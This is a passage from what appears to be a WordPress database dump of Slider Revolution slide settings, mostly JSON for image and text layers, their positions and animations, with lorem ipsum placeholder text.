center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide3-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"power3.out\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h10-slide3-graphic2.jpg\",\"imageId\":2942},\"size\":{\"width\":{\"d\":{\"v\":\"641px\",\"e\":true},\"n\":{\"v\":\"542px\",\"e\":true},\"t\":{\"v\":\"641px\",\"e\":true},\"m\":{\"v\":\"599px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"388px\",\"e\":true},\"n\":{\"v\":\"328px\",\"e\":true},\"t\":{\"v\":\"388px\",\"e\":true},\"m\":{\"v\":\"363px\",\"e\":true}},\"originalWidth\":648,\"originalHeight\":389,\"aspectRatio\":{\"d\":{\"v\":1.6658097686375322},\"n\":{\"v\":1.6658097686375322},\"t\":{\"v\":1.6658097686375322},\"m\":{\"v\":1.6658097686375322}}},\"position\":{\"x\":{\"d\":{\"v\":\"170px\",\"e\":true},\"n\":{\"v\":\"241px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"160px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"170px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":400},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":400,\"startRelative\":400},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":400,\"startRelative\":400},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":600,\"start\":2000,\"startRelative\":600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\" Integer tincidunt dui ac velit facilisis, pretium efficitur lorem scelerisque. Vestibulum gravida leo non enim feugiat.\",\"alias\":\" Integer tincidunt d...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"304px\",\"e\":true},\"n\":{\"v\":\"293px\",\"e\":true},\"t\":{\"v\":\"304px\",\"e\":true},\"m\":{\"v\":\"182px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"70px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"70px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"304px\",\"originalHeight\":\"70px\"},\"position\":{\"x\":{\"d\":{\"v\":\"210px\",\"e\":true},\"n\":{\"v\":\"349px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"66px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"240px\",\"e\":true},\"n\":{\"v\":\"188px\",\"e\":true},\"t\":{\"v\":\"250px\",\"e\":true},\"m\":{\"v\":\"185px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":400},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":400,\"startRelative\":400},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":400,\"startRelative\":400},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":600,\"start\":2000,\"startRelative\":600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"15px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"21px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(21,8,4,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left center\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide4-graphic1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"transition\":[\"parallaxtobottom\"],\"slots\":[\"default\"],\"duration\":[\"default\"]},\"panzoom\":{\"ease\":\"power3.out\",\"fitEnd\":\"110\",\"fitStart\":\"105\"},\"nav\":{\"bullets\":{\"presets\":{\"bullet-size-def\":true,\"bullet-size\":\"12\"}}},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"11\":{\"text\":\" \",\"alias\":\"Shape\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"800px\",\"e\":true},\"n\":{\"v\":\"620px\",\"e\":true},\"t\":{\"v\":\"620px\",\"e\":true},\"m\":{\"v\":\"383px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"570px\",\"e\":true},\"n\":{\"v\":\"480px\",\"e\":true},\"t\":{\"v\":\"480px\",\"e\":true},\"m\":{\"v\":\"472\",\"e\":true}},\"originalWidth\":\"800px\",\"originalHeight\":\"570px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-401px\",\"e\":true},\"n\":{\"v\":\"-210px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"90px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"140px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"#ffffff\",\"borderColor\":\"rgba(0,0,0,0.5)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"type\":\"shape\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content.\",\"alias\":\"It is a long establi...\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"v\":\"652px\",\"e\":true},\"n\":{\"v\":\"525px\",\"e\":true},\"t\":{\"v\":\"494px\",\"e\":true},\"m\":{\"v\":\"298px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"90px\",\"e\":true},\"t\":{\"v\":\"88px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"652px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-397px\",\"e\":true},\"n\":{\"v\":\"-200px\",\"e\":true},\"t\":{\"v\":\"15px\",\"e\":true},\"m\":{\"v\":\"-563px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"-30px\",\"e\":true},\"t\":{\"v\":\"-63px\",\"e\":true},\"m\":{\"v\":\"359px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"25px\",\"e\":true},\"m\":{\"v\":\"21px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e